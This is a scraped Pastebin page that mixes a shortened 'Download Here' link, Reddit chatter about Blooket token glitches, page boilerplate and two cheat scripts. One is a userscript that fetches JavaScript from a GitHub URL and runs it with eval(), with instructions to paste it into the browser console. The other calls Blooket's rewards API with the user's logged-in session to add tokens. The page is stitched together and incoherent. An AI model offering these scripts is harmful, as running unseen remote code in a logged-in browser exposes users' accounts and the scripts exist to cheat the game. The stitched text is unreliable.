Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -
- Download Here --> https://tinyurl.com/5hcwp8n4 (Copy and Paste Link)
- Blooket token glitch
- Oh shush, i just meant if it could cause a ban.
- No of course you won't get banned. I don't think you can even get banned lol
- And blooket already did something to weaken the glitch
- It isn't illegal, they won't ban you. They will only patch the glitch. And also, you can't get banned on blooket.
- In my opinion it's going to be hard to patch. It relates to the browser
- No actually pls help me i got arrested and sent to a federal prison and they're charging me 10k. HELP PLZ I NEED A LAWYER
- But actually it's really funny how much stuff blooket does client side lol
- // ==UserScript== // @name Blooket Auto Coins // @namespace http://tampermonkey.net/ // @version 1.0 // @description This app gives you coins with one function. // @author DaCuteRaccoon // @match /^https?\:\/\/blooket\..*\/.*$/ // @icon https://www.google.com/s2/favicons?domain=blooket.com // @grant none // ==/UserScript== fetch("https://raw.githubusercontent.com/DaCuteRaccoon/blooket/main/auto/app.js") .then((res) => res.text() .then((t) => eval(t)))
- This code gives 500 tokens automatically. Copy and paste in your console(ctrl+j). Then press enter. Then reload page. Tokens should come.
- Bro whyyyyy bro are you replying to a post from 7 months ago
- @RaringBruff Necroposting very hard. plus the reason why it doesn't work now is because it got patched.
- Explore properties
- Follow Us
- Overview
- Community
- STRANGEST GLITCH!!
- I opened the Blooket fanmade Github page (https://blooket.github.io/index.html) and went back to the game I was in. Btw I was logged out at the time.
- i dont see the glitch is it that you have all of these blooks that you shouldn't have?
- Yeah. Some of them were bugged too.
- I had the same thing happen to me.
- my friends got that glitch and tried to sell one
- that glitch is realy common it happens all the time
- yond glitch is realy ingraft t happeneth all the time
- I am a bot and I swapp'd some of thy words with Shakespeare words.
- Commands: !ShakespeareInsult , !fordo , !optout
- what so how do u do it, like do i press the link??
- No, it has something to do with logging in while in the game. Check the other comments for more info.
- can someone make a vid on how to do this
- is there a vid of how to do it
- hi i just joined how can i get a king or a hack to get king from medieval box tysm
- How to get 1000000000000000 coins pls tell me?
- About Community
- This community is for BLOOKET users. Spamming will not be tolerated. Posts that are not Blooket related will be warned and then banned and no inappropriate language is tolerated. ———————————————————Make sure its family friendly. All links to games will be removed after an hour, as the code will be invalid. #watkahoot #kahootisdead ——————————————————— Do NOT promote hacks / cheats here, as they ruin the game for others, and we don’t appreciate them being used detrimentally.
- Reddit and its partners use cookies and similar technologies to provide you with a better experience. By accepting all cookies, you agree to our use of cookies to deliver and maintain our services and site, improve the quality of Reddit, personalize Reddit content and advertising, and measure the effectiveness of advertising. By rejecting non-essential cookies, Reddit may still use certain cookies to ensure the proper functionality of our platform. For more information, please see our Cookie Notice and our Privacy Policy .
- thesmartcoder123 / Blooket Token Hack
- This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
- async function getName() const response = await fetch('https://api.blooket.com/api/users/verify-token', method: "GET", headers: "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,ru;q=0.8", >, credentials: "include" >); const data = await response.json(); return data.name; >; async function addCurrencies() const tokens = Number(prompt('How many tokens do you want to add to your account? (1000 daily)')); if (tokens > 1000) alert('You can only add up to 1000 tokens daily.'); >; const response = await fetch('https://api.blooket.com/api/users/add-rewards', method: "PUT", headers: "referer": "https://www.blooket.com/", "content-type": "application/json", >, credentials: "include", body: JSON.stringify( addedTokens: tokens, addedXp: 900, name: await getName() >) >); if (response.status == 300) alert(`$ tokens and 900 XP added to your account!`); > else alert('Not working Error Occured.'); >; >; addCurrencies();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement